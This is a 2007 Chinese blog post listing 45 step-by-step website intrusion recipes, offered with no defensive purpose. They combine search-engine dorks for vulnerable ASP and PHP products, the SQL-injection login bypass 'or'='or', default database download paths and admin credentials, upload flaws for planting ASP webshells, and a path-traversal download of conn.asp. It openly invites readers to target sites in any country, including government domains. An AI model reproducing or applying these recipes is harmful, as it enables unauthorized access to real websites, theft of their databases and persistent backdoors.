注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

我的博客

小猪哥

 
 
 

日志

 
 

比较经典入侵~之~关键词的利用  

2007-02-16 17:33:14|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

1,

到GoogLe,搜索一些关键字,edit.asp?   韩国肉鸡为多,多数为MSSQL数据库!

2,

到Google ,site:cq.cn inurl:asp

3,

利用挖掘鸡和一个ASP木马.

文件名是login.asp

路径组是/manage/

关键词是went.asp

用'or'='or'来登陆

4,

关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 'or'='or'

5.

动感购物系统

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞

6。

默认数据库地址blogdata/acblog.asa

  关键字:acblog

7.

百度 /htdocs

注册里可以直接上传asa文件!

8.

/Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version

9.

用挖掘机          

关键字:Powered by WEBBOY

页面:/upfile.asp

10.

baidu中搜索关键字Ver5.0 Build 0519

(存在上传漏洞)

11.

Upfile_Article.asp bbs/upfile.asp

输入关键字:powered by mypower ,

12.

inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

13.

现在GOOGLE搜索关键字   intitle:网站小助手 inurl:asp

14.

键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛

挖掘鸡的关键字 添   setup.asp

15.

VBulletin论坛的数据库

默认数据库地址!

/includes/functions.php

工具:

1.网站猎手 下载地址:百度 Google!

2.Google

关键字:

Powered by: vBulletin Version 3.0.1

Powered by: vBulletin Version 3.0.2

Powered by: vBulletin Version 3.0.3

其中一个就可以了

16.

1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart

open source。 这是一个商场系统。

2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~

猜到,comersus.mdb. 是数据库名

数据库都是放在database/ 后的,

所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。

那样把前一个''store/''除去,再加上database/comersus.mdb 试试

17.

无忧传奇官方站点程序。

      1、后台管理地址:http://您的域名/msmiradmin/

      2、默认后台管理帐号:msmir

      3、默认后台管理密码:msmirmsmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb

数据库连接文件为 ***********/Conn.asp

18.

百度里输入/skins/default/

19.

利用挖掘机

关键机:power by Discuz

路径:/wish.php

配合:

Discuz!论坛 wish.php远程包含漏洞 工具使用

20.

上传漏洞.

工具 : Domain3.5

    网站猎手 1.5版

关键字powered by mypower

检测的页面或文件插入upfile_photo.asp

21.

新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"

把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp

以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了

\database\%23newasp.mdb

如:#xzws.mdb 改成%23xzws.mdb

22.

通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子

商城入侵:

关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成

漏洞页面:upload.asp  

      upfile_flash.asp

动力入侵:

关键字:powered by mypower

漏洞页面:upfile_photo.asp

      Upfile_Soft.asp

      upfile_adpic.asp

      upfile_softpic.asp

23.

注射漏洞

百度搜索:oioj's blog

24

动易

列目录

admin_articlerecyclebin.asp

inurl:admin_articlerecyclebin.asp

25.

工具:网站猎手

关键词:inurl:Went.asp

后缀:manage/login.asp

口令:'or'='or'

26.

入侵魔兽私服

需要的工具:ASP木马一只。

        Domain3.5明小子

关键字:All Right Reserved Design:游戏联盟

后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb

27.

漏洞是利用管理员iis设置的失误

用baidu 关键字就是比较罕见的脚本名

动网: ReloadForumCache.asp

Leadbbs: makealltopanc.asp

BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp

28.

国外站的爆库漏洞

关键字:sad Raven's Guestbook

密码地址:/passwd.dat

后台地址:/admin.php

29.

Discuz 4.1.0跨站漏洞

利用工具:1,WAP浏览器

      2,WAP编码转换器

关键字:"intext:Discuz! 4.1.0"

30.

关键字:尚奈克斯

后台路径/system/manage.asp

直接传ASP木马

31.

工具

1:网站猎手

2:大马一个

关键字:切勿关闭Cookies功能,否则您将不能登录

插入diy.asp

32.

关键字:Team5 Studio All rights reserved

默认数据库:data/team.mdb

33.

工具:   挖掘机 辅臣数据库读取器

关键字:   企业简介 产品展示 产品列表

后缀添加: /database/myszw.mdb

后台地址: admin/Login.asp

34.

关键子   XXX inurl:Nclass.asp

在"系统设置"里写个木马。

会被保存到 在 config.asp内。

35.

不进后台照样拿动网WEBSHELL

data.asp?action=BackupData       动网数据库备份默认路径

36.

工具:网站猎手 WebShell

关键字:inurl:Went.asp

后缀:manage/login.asp

弱口令:'or'='or'

37.

关键字:Powered by:QCDN_NEWS

随便扫遍文章加一个' ,来试探注入点

后台地址:admin_index.asp

38.

入侵雷池新闻发布系统

关键字:leichinews

去掉leichinews后面的.

打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp

再上传马.....

进访问uppic anran.asp 登陆马.

39.

关键字:Power System Of Article Management Ver 3.0 Build 20030628

默认数据库:database\yiuwekdsodksldfslwifds.mdb

后台地址:自己扫描!

40.

一、通过GOOGLE搜索找大量注入点

关键字:asp?id=1   gov.jp/ asp?id=

页数:100

语言:想入侵哪个国家就填什么语言吧

41.

关键字:Powered by:94KKBBS 2005

利用密码找回功能 找回admin

提问:ddddd 回答:ddddd

42.

关键字:inurl:Went.asp

后台为manage/login.asp

后台密码: 'or'=' 或者 'or''=''or' 登录 进入

默认数据库地址:Database/DataShop.mdb

43.

关键字:六合彩 inurl:readnews.asp

把最后一个/改成%5c ,直接暴库,看密码,进后台

随便添加个新闻 在标题输入我们的一句话木马

44.

工具:一句话木马

  BBsXp 5.0 sp1 管理员猜解器

关键词:powered by bbsxp5.00

进后台,备份一句话马!

45.

关键字:程序核心:BJXSHOP网上开店专家

后台:/admin

默认帐号密码:admin

  评论这张
 
阅读(13178)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017